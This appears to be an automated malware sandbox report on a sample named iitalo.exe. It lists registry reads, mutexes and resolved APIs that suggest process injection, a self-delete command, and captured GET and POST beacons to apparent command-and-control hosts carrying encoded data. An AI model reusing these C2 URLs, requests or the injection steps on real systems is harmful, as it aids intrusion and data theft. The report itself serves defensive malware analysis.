Cache\MSHist012017011320170114\CachePrefix HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Extensible Cache\MSHist012017011320170114\CacheLimit HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Extensible Cache\MSHist012017011320170114\CacheOptions HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Extensible Cache\PrivacIE:\CacheRepair HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Extensible Cache\PrivacIE:\CachePath HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Extensible Cache\PrivacIE:\CachePrefix HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Extensible Cache\PrivacIE:\CacheLimit HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Extensible Cache\PrivacIE:\CacheOptions HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Extensible Cache\UserData\CacheRepair HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Extensible Cache\UserData\CachePath HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Extensible Cache\UserData\CachePrefix HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Extensible Cache\UserData\CacheLimit HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Extensible Cache\UserData\CacheOptions HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\CurrentVersion\Internet Settings\CreateUriCacheSize HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\CurrentVersion\Internet Settings\CreateUriCacheSize HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\CreateUriCacheSize HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Internet Settings\CreateUriCacheSize HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\CurrentVersion\Internet Settings\EnablePunycode HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\CurrentVersion\Internet Settings\EnablePunycode HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\EnablePunycode HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Internet Settings\EnablePunycode HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\MAIN\FeatureControl\FEATURE_HTTP_USERNAME_PASSWORD_DISABLE\ipconfig.exe HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\MAIN\FeatureControl\FEATURE_HTTP_USERNAME_PASSWORD_DISABLE\* HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\CurrentVersion\Internet Settings\Security_HKLM_only HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Command Processor\DisableUNCCheck HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Command Processor\EnableExtensions HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Command Processor\DelayedExpansion HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Command Processor\DefaultColor HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Command Processor\CompletionChar HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Command Processor\PathCompletionChar HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Command Processor\AutoRun HKEY_CURRENT_USER\Software\Microsoft\Command Processor\DisableUNCCheck HKEY_CURRENT_USER\Software\Microsoft\Command Processor\EnableExtensions HKEY_CURRENT_USER\Software\Microsoft\Command Processor\DelayedExpansion HKEY_CURRENT_USER\Software\Microsoft\Command Processor\DefaultColor HKEY_CURRENT_USER\Software\Microsoft\Command Processor\CompletionChar HKEY_CURRENT_USER\Software\Microsoft\Command Processor\PathCompletionChar HKEY_CURRENT_USER\Software\Microsoft\Command Processor\AutoRun HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\DcomLaunch\ObjectName HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\RpcEptMapper\ObjectName HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\RpcSs\ObjectName HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\VaultSvc\ObjectName HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\VaultSvc\ImagePath HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\VaultSvc\WOW64 HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\ProfileList\ProgramData HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\ProfileList\Public HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\ProfileList\Default HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\ProgramFilesDir HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\CommonFilesDir HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\ProgramFilesDir (x86) HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\CommonFilesDir (x86) HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\ProgramW6432Dir HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\CommonW6432Dir HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\ProfileList\S-1-5-18\ProfileImagePath HKEY_USERS\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders\AppData HKEY_USERS\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders\Local AppData HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\VaultSvc\Environment HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\VaultSvc\RequiredPrivileges
Write Keys
HKEY_CURRENT_USER\(Default)
Delete Keys
Nothing to display
Mutexes
Local\_!MSFTHISTORY!_ Local\c:!users!seven01!appdata!local!microsoft!windows!temporary internet files!content.ie5! Local\c:!users!seven01!appdata!roaming!microsoft!windows!cookies! Local\c:!users!seven01!appdata!local!microsoft!windows!history!history.ie5!
Resolved APIs
advapi32.dll.RegOpenKeyExW advapi32.dll.RegQueryInfoKeyW advapi32.dll.RegEnumKeyExW advapi32.dll.RegEnumValueW advapi32.dll.RegCloseKey advapi32.dll.RegQueryValueExW kernel32.dll.FlsAlloc kernel32.dll.FlsFree kernel32.dll.FlsGetValue kernel32.dll.FlsSetValue kernel32.dll.InitializeCriticalSectionEx kernel32.dll.CreateEventExW kernel32.dll.CreateSemaphoreExW kernel32.dll.SetThreadStackGuarantee kernel32.dll.CreateThreadpoolTimer kernel32.dll.SetThreadpoolTimer kernel32.dll.WaitForThreadpoolTimerCallbacks kernel32.dll.CloseThreadpoolTimer kernel32.dll.CreateThreadpoolWait kernel32.dll.SetThreadpoolWait kernel32.dll.CloseThreadpoolWait kernel32.dll.FlushProcessWriteBuffers kernel32.dll.FreeLibraryWhenCallbackReturns kernel32.dll.GetCurrentProcessorNumber kernel32.dll.GetLogicalProcessorInformation kernel32.dll.CreateSymbolicLinkW kernel32.dll.EnumSystemLocalesEx kernel32.dll.CompareStringEx kernel32.dll.GetDateFormatEx kernel32.dll.GetLocaleInfoEx kernel32.dll.GetTimeFormatEx kernel32.dll.GetUserDefaultLocaleName kernel32.dll.IsValidLocaleName kernel32.dll.LCMapStringEx kernel32.dll.GetTickCount64 advapi32.dll.EventRegister mscoree.dll.#142 mscoreei.dll.RegisterShimImplCallback mscoreei.dll.OnShimDllMainCalled mscoreei.dll._CorExeMain shlwapi.dll.UrlIsW version.dll.GetFileVersionInfoSizeW version.dll.GetFileVersionInfoW version.dll.VerQueryValueW clr.dll.SetRuntimeInfo clr.dll._CorExeMain mscoree.dll.CreateConfigStream mscoreei.dll.CreateConfigStream kernel32.dll.GetNumaHighestNodeNumber kernel32.dll.GetSystemWindowsDirectoryW advapi32.dll.AllocateAndInitializeSid advapi32.dll.OpenProcessToken advapi32.dll.GetTokenInformation advapi32.dll.InitializeAcl advapi32.dll.AddAccessAllowedAce advapi32.dll.FreeSid kernel32.dll.AddSIDToBoundaryDescriptor kernel32.dll.CreateBoundaryDescriptorW kernel32.dll.CreatePrivateNamespaceW kernel32.dll.OpenPrivateNamespaceW kernel32.dll.DeleteBoundaryDescriptor kernel32.dll.WerRegisterRuntimeExceptionModule kernel32.dll.RaiseException mscoree.dll.#24 mscoreei.dll.#24 ntdll.dll.NtSetSystemInformation kernel32.dll.SortGetHandle kernel32.dll.SortCloseHandle kernel32.dll.GetNativeSystemInfo ole32.dll.CoInitializeEx cryptbase.dll.SystemFunction036 uxtheme.dll.ThemeInitApiHook user32.dll.IsProcessDPIAware ole32.dll.CoGetContextToken clrjit.dll.sxsJitStartup clrjit.dll.getJit kernel32.dll.QueryPerformanceFrequency kernel32.dll.QueryPerformanceCounter user32.dll.RegisterWindowMessageW user32.dll.GetSystemMetrics kernel32.dll.GetModuleHandleW kernel32.dll.LoadLibraryW user32.dll.AdjustWindowRectEx kernel32.dll.GetCurrentProcess kernel32.dll.GetCurrentThread kernel32.dll.DuplicateHandle kernel32.dll.GetCurrentThreadId kernel32.dll.GetProcAddress kernel32.dll.WideCharToMultiByte user32.dll.DefWindowProcW gdi32.dll.GetStockObject kernel32.dll.LocaleNameToLCID kernel32.dll.LCIDToLocaleName kernel32.dll.GetUserPreferredUILanguages user32.dll.RegisterClassW mscoree.dll.GetProcessExecutableHeap mscoreei.dll.GetProcessExecutableHeap ole32.dll.CoTaskMemAlloc ole32.dll.CoTaskMemFree user32.dll.CreateWindowExW user32.dll.SetWindowLongW user32.dll.GetWindowLongW nlssorting.dll.SortGetHandle nlssorting.dll.SortCloseHandle user32.dll.CallWindowProcW user32.dll.GetClientRect user32.dll.GetWindowRect user32.dll.GetParent kernel32.dll.GetSystemDefaultLCID gdi32.dll.GetObjectW user32.dll.GetDC gdiplus.dll.GdiplusStartup kernel32.dll.IsProcessorFeaturePresent user32.dll.GetWindowInfo user32.dll.GetAncestor user32.dll.GetMonitorInfoA user32.dll.EnumDisplayMonitors user32.dll.EnumDisplayDevicesA gdi32.dll.ExtTextOutW gdi32.dll.GdiIsMetaPrintDC gdiplus.dll.GdipCreateFontFromLogfontW kernel32.dll.RegOpenKeyExW kernel32.dll.RegQueryInfoKeyA kernel32.dll.RegCloseKey kernel32.dll.RegCreateKeyExW kernel32.dll.RegQueryValueExW kernel32.dll.RegEnumValueW kernel32.dll.RegQueryInfoKeyW mscoree.dll.ND_RI2 mscoreei.dll.ND_RI2 mscoree.dll.ND_RU1 mscoreei.dll.ND_RU1 gdiplus.dll.GdipGetFontUnit gdiplus.dll.GdipGetFontSize gdiplus.dll.GdipGetFontStyle gdiplus.dll.GdipGetFamily user32.dll.ReleaseDC gdiplus.dll.GdipCreateFromHDC gdiplus.dll.GdipGetDpiY gdiplus.dll.GdipGetFontHeight gdiplus.dll.GdipGetEmHeight gdiplus.dll.GdipGetLineSpacing gdiplus.dll.GdipDeleteGraphics gdiplus.dll.GdipCreateFont gdiplus.dll.GdipDeleteFont kernel32.dll.CompareStringOrdinal kernel32.dll.GetFullPathNameW kernel32.dll.SetThreadErrorMode kernel32.dll.GetFileAttributesExW kernel32.dll.ResolveLocaleName gdi32.dll.CreateCompatibleDC gdiplus.dll.GdipGetLogFontW mscoree.dll.ND_WU1 mscoreei.dll.ND_WU1 gdi32.dll.CreateFontIndirectW gdi32.dll.SelectObject gdi32.dll.GetTextMetricsW gdi32.dll.GetTextExtentPoint32W gdi32.dll.DeleteDC ole32.dll.CoCreateGuid kernel32.dll.GetCurrentProcessId advapi32.dll.LookupPrivilegeValueW advapi32.dll.AdjustTokenPrivileges kernel32.dll.CloseHandle kernel32.dll.OpenProcess psapi.dll.EnumProcessModules psapi.dll.GetModuleInformation psapi.dll.GetModuleBaseNameW psapi.dll.GetModuleFileNameExW clr.dll.CreateAssemblyNameObject ole32.dll.CoGetObjectContext sechost.dll.LookupAccountNameLocalW advapi32.dll.LookupAccountSidW sechost.dll.LookupAccountSidLocalW cryptsp.dll.CryptAcquireContextW cryptsp.dll.CryptGenRandom ole32.dll.NdrOleInitializeExtension ole32.dll.CoGetClassObject ole32.dll.CoGetMarshalSizeMax ole32.dll.CoMarshalInterface ole32.dll.CoUnmarshalInterface ole32.dll.StringFromIID ole32.dll.CoGetPSClsid ole32.dll.CoCreateInstance ole32.dll.CoReleaseMarshalData ole32.dll.DcomChannelSetHResult rpcrtremote.dll.I_RpcExtInitializeExtensionPoint clr.dll.CreateAssemblyEnum gdiplus.dll.GdipLoadImageFromStream windowscodecs.dll.DllGetClassObject kernel32.dll.WerRegisterMemoryBlock gdiplus.dll.GdipImageForceValidation gdiplus.dll.GdipGetImageType gdiplus.dll.GdipGetImageRawFormat gdiplus.dll.GdipGetImageWidth gdiplus.dll.GdipGetImageHeight gdiplus.dll.GdipGetImageEncodersSize kernel32.dll.LocalAlloc gdiplus.dll.GdipGetImageEncoders kernel32.dll.LocalFree gdiplus.dll.GdipSaveImageToStream gdiplus.dll.GdipCreateBitmapFromStream gdiplus.dll.GdipBitmapLockBits gdiplus.dll.GdipBitmapUnlockBits bcrypt.dll.BCryptGetFipsAlgorithmMode kernel32.dll.CreateFileW kernel32.dll.GetFileType advapi32.dll.RegSetValueExW ntdll.dll.NtSuspendProcess kernel32.dll.GetCurrentDirectoryW kernel32.dll.CreateProcessW kernel32.dll.GetThreadContext ntdll.dll.ZwReadVirtualMemory kernel32.dll.VirtualAllocEx kernel32.dll.WriteProcessMemory kernel32.dll.SetThreadContext kernel32.dll.ResumeThread ntdll.dll.NtResumeProcess kernel32.dll.DeleteFileW ole32.dll.CoWaitForMultipleHandles gdiplus.dll.GdipDisposeImage user32.dll.SetClassLongW user32.dll.PostMessageW user32.dll.UnregisterClassW advapi32.dll.EventUnregister gdi32.dll.DeleteObject kernel32.dll.CreateActCtxW kernel32.dll.AddRefActCtx kernel32.dll.ReleaseActCtx kernel32.dll.ActivateActCtx kernel32.dll.DeactivateActCtx kernel32.dll.GetCurrentActCtx kernel32.dll.QueryActCtxW cryptsp.dll.CryptReleaseContext mlang.dll.#112 wininet.dll.FindFirstUrlCacheEntryA kernel32.dll.SetFileInformationByHandle shell32.dll.SHGetFolderPathW urlmon.dll.CreateUri kernel32.dll.InitializeSRWLock kernel32.dll.AcquireSRWLockExclusive kernel32.dll.AcquireSRWLockShared kernel32.dll.ReleaseSRWLockExclusive kernel32.dll.ReleaseSRWLockShared wininet.dll.FindNextUrlCacheEntryA wininet.dll.FindCloseUrlCache oleaut32.dll.#500 oleaut32.dll.#8 oleaut32.dll.#9 oleaut32.dll.#10 kernel32.dll.SetThreadUILanguage kernel32.dll.CopyFileExW kernel32.dll.IsDebuggerPresent kernel32.dll.SetConsoleInputExeNameW
Execute Commands
"C:\Users\Seven01\AppData\Local\Temp\iitalo.exe" C:\Windows\SysWOW64\cmd.exe /c del "C:\Users\Seven01\AppData\Local\Temp\iitalo.exe" C:\Windows\system32\lsass.exe
Started Services
VaultSvc
Created Services
Nothing to display
Behavior analysis details | |||||
---|---|---|---|---|---|
Machine name | Machine label | Machine manager | Started | Ended | Duration |
Seven02_64 | Seven02_64 | VirtualBox | 2019-12-13 12:16:32 | 2019-12-13 12:19:42 | 190 |
4 HTTP Request(s) detected
http://www.kotelhistory.online/i0i/?Ntilqz=2DR+mTUuoQzV6anS+9eom8POumR5dgzknzQvHlLbzdfq8+YY70iTcPMIrPY4NM/mjXeb25+s&7n=fdfpHTgHU2M0n
- Hostname: www.kotelhistory.online
- IP Address:
- Port: 80
- Count: 1
GET /i0i/?Ntilqz=2DR+mTUuoQzV6anS+9eom8POumR5dgzknzQvHlLbzdfq8+YY70iTcPMIrPY4NM/mjXeb25+s&7n=fdfpHTgHU2M0n HTTP/1.1 Host: www.kotelhistory.online Connection: close \x00\x00\x00\x00\x00\x00\x00
http://www.kravtsev.com/i0i/?Ntilqz=gggd0SO4r0iRio8yGKQtiuEqcDs68QaN4OnfzNQ2coBdDvGUQZFXusSNEbQ7cA6Lcqf+mree&7n=fdfpHTgHU2M0n
- Hostname: www.kravtsev.com
- IP Address: 199.34.228.159
- Port: 80
- Count: 1
GET /i0i/?Ntilqz=gggd0SO4r0iRio8yGKQtiuEqcDs68QaN4OnfzNQ2coBdDvGUQZFXusSNEbQ7cA6Lcqf+mree&7n=fdfpHTgHU2M0n HTTP/1.1 Host: www.kravtsev.com Connection: close \x00\x00\x00\x00\x00\x00\x00
http://www.kravtsev.com/i0i/
- Hostname: www.kravtsev.com
- IP Address: 199.34.228.159
- Port: 80
- Count: 1
POST /i0i/ HTTP/1.1 Host: www.kravtsev.com Connection: close Content-Length: 2200 Cache-Control: no-cache Origin: http://www.kravtsev.com User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Win64; x64; Trident/4.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E) Content-Type: application/x-www-form-urlencoded Accept: */* Referer: http://www.kravtsev.com/i0i/ Accept-Language: en-US Accept-Encoding: gzip, deflate Ntilqz=oCsnq2Da61a71dsha_B62a4ZQy0TqxWNs-m9sPUUQr9DFMzKS4gZ3ZnUPMUONB66IJ(7pcHBNXmeVfpTU-V0cXh1K3omqBCq(xzgf6ZOrD0YHI23vZbK0l9watzgThXcSNblJ9aaTzja7RL68O2iIzTxn5LDATC5KcuHiwG6WMOW3giLecS1Zz9eYdCd4ChOLxeSpSJLkj(zn7Lm0WDfqdUQs64FkMz-uXLst6emTvXDIgCNL94kvW1517s4fZPjeetLiUCdd1(lWiGXXk~kEKnYbb4iaEsBZ2E3dsCbxy7ExUCQ5IeVCiUUgGAkdGN4QXarJPIvC4FDT3reUqiC7vR3CBGAEMxKJ9q9qoiVNFfF2mJ1uFTfTUALodlCfEyeOAz9XWcjfX2DJFeJbP7rfAOActP-DDTwkDRxEoOyeWAPSI6YtoUeHdmTkjo6PRHZC4d25SyUq3TBrkAQCQQZrDN5MSIBSo3SkoveMHqrGVS-vYskA0oO7LWlHB7ec-7_YdnScDjjsJ9I1CSxSdX24pgtFUfixQIDgJnKpaNZ~5ccFt7r09QvcbktSr(9MzC3PhiBY2msxbeA7zguRZ3xUHs775eOPJLaF7hTPkS42osAsnuFEvJiw-qNHj9XMXZ_p4aIuCmzVSM2y3QlT9EQ43dQUGUjyHJmsltj3hra5vLDqMJvA1aZJAIwgmopeE3vmr4zFFGdcHp3yk5IwDv6d31cpl4jjoh7GArC(HIwQZsAge1tOJ9yL_NDM_jSEgc9oBJMmPAy0V(OuwULHx2iZ2prdYpZ6-F3d13IZOXIr47hKlt0GQrPFBK55Z1L5mjXk1lkuYkEkTyKpo4H2j6eOL425Ux7wvby2LMg980sUnSJB-Gep05hyp9x8mfOkkkm3QxqhAvxenXeFI1VGp6b9sEZDcG1SBROGkMlDE96mR2Lp66eE8vjMdht(cuLcEhf3WWlFQq5BMbPot~_cnbPBkvQ7mjqG3(c0qf8oUta0IFno-6aW-VKXxEku_upT0fuAz(bznWL~G8q9WSyDl8jdjkc0J3YVCQcjcvLY38Qh3XNhCUAq-9wpIP349SnAGjw93BbkBsKrVlJI7kUE8IZhakOOWqM0KcFtWycyj(yolZRjJVB8MF357nxxkHAVqEqnp5P32ZnPKnYs4KcvOPZQPFlCbgIw5hl3h23IWbEwvwTNLkDqrmJE1612r8asAcg8C8rjGm9JECFIqW9QVu0WBiE5S~cQMWkZMrEaaj3VaXPlk0oHmuSfV9fXBT0stWiO375oOKXUi(fRPmgXNrulknIXAFp3r4q~OdsytELaY(QPmJQrTXYEAD7HAb_PgXvU3kxjcycLbMSNG1l~Mk39KZ5r88zMxIUtwzvYkivEjBqY11XY0bxTfc2iJCkVAH7470dGloO2_vw48fidgLMpdl637~1tvQMXbA-pYTNA_ViiMl6Gz8eq8UPTGrd0kBNxisjAs7i2nmE8Kll61vUY8cw0N4LhKjSFxL5ig8InebaOFWVYhsKdPHFAq1wnh46OYKzfUSSj8wkQnnZW5Yi~tbgx7xfaP1yr1J-RYjpe5d7EoSQ4cWqFj5gnBxvKpzWkrH1ntXpSo7loyrjGI9MdclOXY3iT4u796P7kCxgYkEegSsS4IQpM0Y0hrxSZEk7KNyOlJOaHztmeeiBsRvmgIXnzvXG3E0G9WFb2K~1XV7Z~KltHbN9Vo9nYYOLy6LfOXFOXNGiCKH7Xe1LrMoFQKdWzPFXP7uM(1K7YAHsqEsdI-fdHIKe3bHMf60D1BYg5B3U9EVZNJuKnRs3qf~1Vvl4SnUjMJ~c1A~CFUJvNliVs66h(eS254DJCPuIDADdL1IDDoK3x24VJmwqreZuDAcwDYAAojrLTPE_PbI6XspYDqRFSWlCbX8eB7ZFMo8Agr1nR3BnpMAAb5UF9ByPrE34UNbM1eIDGEjGa8qYGRwqwuiWGM7TlwFAqYCFL1alG61Z7YpnVO81pYtC~7JHGU7DvZH9Uwh_JpRqrHwJHEw4BLTc63kEa7plE1LvI7cwiQTg8_zd6OauT5Ohqg4mNQEuYKEz0H(ZP385u28sGZhaHB5dRTjSA5J2oIEHktSdz1SOwDYPfE3Dyy4Q3itKmkENzG(P4t3VJfwV3SlFyr9aKkEB5uuBe-lqDnAvrwUQTYAMcPZMuZ9J\x00\x00\x00\x00\x00\x00\x00\x00
http://www.kravtsev.com/i0i/
- Hostname: www.kravtsev.com
- IP Address: 199.34.228.159
- Port: 80
- Count: 1
POST /i0i/ HTTP/1.1 Host: www.kravtsev.com Connection: close Content-Length: 57520 Cache-Control: no-cache Origin: http://www.kravtsev.com User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Win64; x64; Trident/4.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E) Content-Type: application/x-www-form-urlencoded Accept: */* Referer: http://www.kravtsev.com/i0i/ Accept-Language: en-US Accept-Encoding: gzip, deflate Ntilqz=oCsnq37o(G3liIxFLqdq4bISISwZ2RuclJqLsPkQL6scBv7KU9UHoZnTNMUJHR2oIeDjpdCUNXudadQXScNjeHtJSHs75T6r8RrGJo5OlRUWZKflstKF4lh2C_zpax3HA_WtBd6yZSrR(wK0u4q-VzHuva2GAw3CNdvEtQf8ftqUzyrhee(PDAkiQ8L4kB5eP2OSrjAOsDfxrc~71hW56-M9r7I4u8T99ljGprbacKvfCSa1IdtqimEZvo8hfqa_ZY1T4GHpYGy3dTnuH3SsH-iNS8kiQ1MPe18_C8CgzyzA~0Dv5IbaDRkYsmAiZEoyU3SNAu4_NpVDTVCED-CN0PR0dBWbPekGJ96hrYqVMG7Fgyl2sFTfa0ANodlKfEyzOCTxFmEjOGKBI2G5PNnhDwOEdoy6JS7YkAgsHJmydmUMXteclZUZJ9jW9TgUPRC2D5NA9zPa4HTCk0cHGRQzzCc9Dxp3Qca3nI7rPgf_HX350Io0FGlc3Z(HDBmBDrzqY9zsJyOU9_J42zinfcTE0K0Sckj07zgstYvr765rqMAyLt34i_lwWZVhe-v_JWeqG3yfeHutybilxX4RR7KQeyAx9ZS_Qbb8P6Z3YD~Nl7ZQ0EedIe1RycOJAwYidn96l5qOgAfDR1wp4EgHOo1F7ApgGG4RxCsMikYowCOyzsHym9N3aVn8DGIWn0RCflPLurQMcyKcQ2tWnVsz7RzRbHc8mlorkflWGB(G(X8wRdUAxP1qOuB1efNFBfjwAgYLoD5AnPUyxnnMtxUdDireXWpzOJlsxflkd3bcYOaqmb7mPkMzLwrEEgmC7Zxe9mz9klwhkKAUwlvR4rgCwCeZKLYY2VMi~-XFubQmjbQ8bGqVO63rr2JpsYtszEvVgxUzxhhI3kvIRB7JOdhjGIy51MQiJ8mcSQxyCU1PDlJYw3udibGKCsywLMJq(OuldhQGj0i6b0CvIf3UpsiqKQTqH0mG7A(QaFez(5n273tNxfJasbfZU8BxTzFPtdCTHhLoVwjnqlP74Qh47HbWL3wLMmgo2ablUC08~bCAaE81x3jenwYW0eBcrvqg6v~eDTCr~BpapT8XtE9wFpYGeOV8naMzIHSLwNI1tUbvyH3yvVhRiepB7PNk0pTaxWj8W6cnx_BN2Vx8D5fB9J2_38eiVaFHVPgV6aMj2iXKcxXFwpUTOog88abpFxKm(uU4sUo32Qp8rWztRGqTOtiOMGzGCjTf7g6nRcGXbrTgX_PeVL7xmEMhElH6XF4BfTPiutqaRHbrgf(CMjvxdcq6T7KjrhjUfHtG5tgi1f1vveEwRbfkQUNnoHzOPDXWEzTgBy6GCUQWq9WaR5wkDHxLqZQL2PRYxL8DEDcErUruZCvxE3ZyA2IVH2KNS-URnaLlTy~z8KwoMz0z~fbe2vzfcAyE9dRypNHoluARd7FjsJDbGp0JmfR3AwNPt8UeZWyH8hdNxjEvJsvN3QfJl4NcyXf5e8ExxPgzmLPYNRvimCISl5mbZyqNQxk0J67VErJKjQ85C8KZP1bUtrEAbXbZUJ4H5o(yxbIee_lPiWJyWZDxe_N8DIqLxsChJj99lEFBb9PFoK~74seAZZywmnvjcslAHrVae7D8Q72FoobSgxxGYUYwmHsO~ssbAnUywaYJPWs-ON~qgpDLKzpyVsKK1xiqhdzJ2fXck1hm9m4c2IvJQGDH~I1ufZN2VZEkX8L1z8ftL2NubMmYOfSjd8NctN4mebZm2NxPPaeu9i6xTij-4QoLfZD_F6SD~-X_Nrse8TJrtijHqV1kPLyzkGM2l8GicPp_CFV7NvGQyEy2LVJRFH6MpJKf4bi1uYfPe9fsbDXOCgkLWY680EcVCk5g9OV8Eg1rMJs_33HFeeYVEclEXNpnCZRISWs1QH8WBbM0DKkxyMV1LmlFi-psc7hjih6P~S(OfYnhwfdrS2zaecy7FyMrn8iQMffNpwBvqo7nOxaaPeRaiu5lNeAwhY4F9-hwdBWut47VUw4kGLVHs30MC14nE4PG1G4tbYV4NjffXeFJ(i~y~vHX3s3FdY~L6wklaTU_Y9grnXeCPTtkjTgedsxpLxlTZy7SVrVjrbR3pfCF3D3-z3QeAV72kgU4tGEgo0wWvVOjzLbjBNE82wdOn8IYKFEH98GaNvprOjASsEsVN5daJ4Vkkf0FvPx0ckCACUuwirT-RY3f(fxNIzC2uYENQaMj7KP40uLWUumfu9x3GJ4DlnErgMbYdAlfeN43k4zsYQFWZFYLW9Ilc53eOaqeRNrqM4E3wBLH8uLSAwSaO3xfKeKwoM4m3Ktsuf64QkdUaIfR9wXn~HD89HRihvCVk-Dkf31tmCJhOE4EohFRz5qlA5xFYc2Zca1_5aDAUny6vEZiohS3a2bOkMbwfCNN
Detected family: #Malicious
TheSystem Itself @ 2021-03-02 21:36:02
#infosec #automation
TheSystem Itself @ 2019-12-13 12:18:10